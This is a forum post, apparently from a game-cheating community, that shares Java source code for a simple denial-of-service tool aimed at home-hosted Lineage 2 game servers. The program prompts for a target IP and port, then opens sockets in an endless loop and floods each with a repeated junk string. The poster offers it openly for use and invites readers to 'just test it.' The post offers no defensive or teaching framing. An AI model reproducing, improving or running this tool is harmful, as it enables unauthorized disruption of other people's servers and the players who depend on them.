Jump to content

Recommended Posts

Posted

Just One NewBie java dos attacker... it cant destroy any "l2 server" but if "l2 server" have got homemaded "server" it can litle lag it ;)

package doscript;

import java.util.Scanner;
import java.io.*;
import java.net.*;
public class Main {
   public static void main(String[] args) throws IOException {
        Scanner x = new Scanner(System.in);
        String A;
        int B;
        System.out.println("+-----------------------------------------------+");
        System.out.println("+---       Coolis Java Dos Attacker   ---+");
        System.out.println("+-----            MaxCheaterS.com            ----+");
        System.out.println("+-----------------------------------------------+");
        System.out.print("Enter target IP:");
        A = x.next();
        System.out.print("\nEnter target port:");
        B = x.nextInt();
        while (1==1) {
        Socket sock = new Socket(A, B);
        BufferedReader in = new BufferedReader(new InputStreamReader(sock.getInputStream()));
        PrintWriter out = new PrintWriter(sock.getOutputStream(), true);
        System.out.print("*");
        out.print("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA​AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
        in.close();
     }
}
}

 

Just test it... (if you try to dedicated it will have no effect... Only for home pc...)

  • 2 months later...
  • 3 months later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now


×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..